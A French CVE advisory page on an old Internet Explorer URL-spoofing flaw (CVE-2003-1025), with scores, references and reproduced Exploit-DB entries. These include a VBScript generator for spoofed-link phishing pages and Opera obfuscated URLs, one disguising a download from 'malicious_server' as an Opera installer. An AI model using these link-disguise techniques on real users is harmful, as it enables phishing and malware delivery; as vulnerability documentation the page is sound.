CVE-2003-1025 : Détail

CVE-2003-1025

A03-Injection
96.78%V3
Network
2004-01-06
04h00 +00:00
2018-10-12
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Internet Explorer 5.01 through 6 SP1 allows remote attackers to spoof the domain of a URL via a "%01" character before an @ sign in the user@domain portion of the URL, which hides the rest of the URL, including the real site, in the address bar, aka the "Improper URL Canonicalization Vulnerability."

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 23422

Date de publication : 2003-12-08 23h00 +00:00
Auteur : Guy Crumpley
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/9182/info A weakness has been reported in multiple browsers that may allow attackers to obfuscate the URI for a visited page. The problem is said to occur when a URI designed to pass access a specific location with a supplied username, contains a hexadecimal 1 value prior to the @ symbol. An attacker could exploit this issue by supplying a malicious URI pointing to a page designed to mimic that of a trusted site, and tricking a victim who follows a link into believing they are actually at the trusted location. On Error Resume Next PromtStart = "Do you want to create a web page to exploit Internet Explorer 5.01, 5.5 and 6.0 on Windows" _ & " platforms?" & vbcrlf & "(URL Obfuscation - https://www.securityfocus.com/bid/9182)" Ok2Run = MsgBox (PromtStart,vbyesno + vbquestion,"URL Obfuscation Web Page Creator") If Ok2Run = vbyes Then Do While strFileName = "" strFileName = InputBox ("Enter the name of the web page file you want to create","File Name","TEST.HTML") Loop Do While strSpoofSite = "" strSpoofSite = InputBox ("Enter the name of the site you want users to THINK they're going to:","Spoof Site","atkins.com") Loop Do While strRealSite = "" strRealSite = InputBox ("Enter the name of the site users WILL go to when they click on the link:","Real Site","www.mcdonalds.com") Loop Do While strLinkText = "" strLinkText = InputBox ("Enter the text you want to appear in the link:","Link Text","Go to the Atkins Site") Loop Err.Clear CreateExploitPage strFileName, strSpoofSite, strRealSite, strLinkText If Err.Number = 0 then MsgBox "Your exploit page has been saved to C:\" & strFileName & ".",vbokonly + vbinformation, "Script Complete" Else MsgBox "An error occured (" & Err.Description & ")saving your exploit page to C:\" & strFileName & ".",vbokonly + vbcritical, "Script Error" Err.Clear End if Else MsgBox "Script canceled.",vbokonly + vbcritical,"URL Obfuscation Web Page Creator" End If Sub CreateExploitPage(strFileName, strSpoofSite, strRealSite, strLinkText) Set fs = CreateObject("Scripting.FileSystemObject") Set a = fs.CreateTextFile("c:\" & strFileName, True) a.WriteLine("<HTML>") a.WriteLine("<TITLE>Exploit Page for BID 9182 (https://www.securityfocus.com/bid/9182)</TITLE>") a.WriteLine("<BODY>") strExploitLine = "<A HREF=" & Chr(34) & "http://" & strSpoofSite & Chr(1) & "%00@" & strRealSite strExploitLine = strExploitLine & Chr(34) & ">" & strLinkText & "</A>" a.WriteLine(strExploitLine) a.WriteLine("</BODY>") a.WriteLine("</HTML>") a.Close End Sub
Exploit Database EDB-ID : 23423

Date de publication : 2003-12-08 23h00 +00:00
Auteur : Zap The Dingbat
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/9182/info A weakness has been reported in multiple browsers that may allow attackers to obfuscate the URI for a visited page. The problem is said to occur when a URI designed to pass access a specific location with a supplied username, contains a hexadecimal 1 value prior to the @ symbol. An attacker could exploit this issue by supplying a malicious URI pointing to a page designed to mimic that of a trusted site, and tricking a victim who follows a link into believing they are actually at the trusted location. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23423.zip
Exploit Database EDB-ID : 23465

Date de publication : 2003-12-22 23h00 +00:00
Auteur : nesumin
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/9281/info A weakness has been reported in Opera that may allow attackers to obfuscate the URI for a visited page. The problem is said to occur when a URI that is designed to access a specific location with a supplied username, contains a specially crafted sequence of characters. These characters will be interpreted as a NULL due to UTF-8 encoding. This sequence may be placed as part of the username value prior to the @ symbol in the malicious URI to aid in obfuscating the URI for a visited page. An attacker could exploit this issue by supplying a malicious URI pointing to a page designed to mimic that of a trusted site, and tricking a victim who follows a link into believing they are actually at the trusted location. http://www.example.com%C0%AFfake_path%C0%AFfake_filename%C0%AEhtml%C0%80@www.example.com/ http://www.example.com/fake_path/fake_filename.html ftp://ftp.example.com%C0%AFpub%C0%AFopera%C0%AFwin%C0%AF723%C0%AFen%C0%AFstd%C0%AFow32enen723%C0%AEexe%C0%80:password@malicious_server/ow32enen723.exe ftp://ftp.example.com/pub/opera/win/723/en/std/ow32enen723.exe

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 6.0

Références

http://www.kb.cert.org/vuls/id/652278
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/archive/1/346948
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.us-cert.gov/cas/techalerts/TA04-033A.html
Tags : third-party-advisory, x_refsource_CERT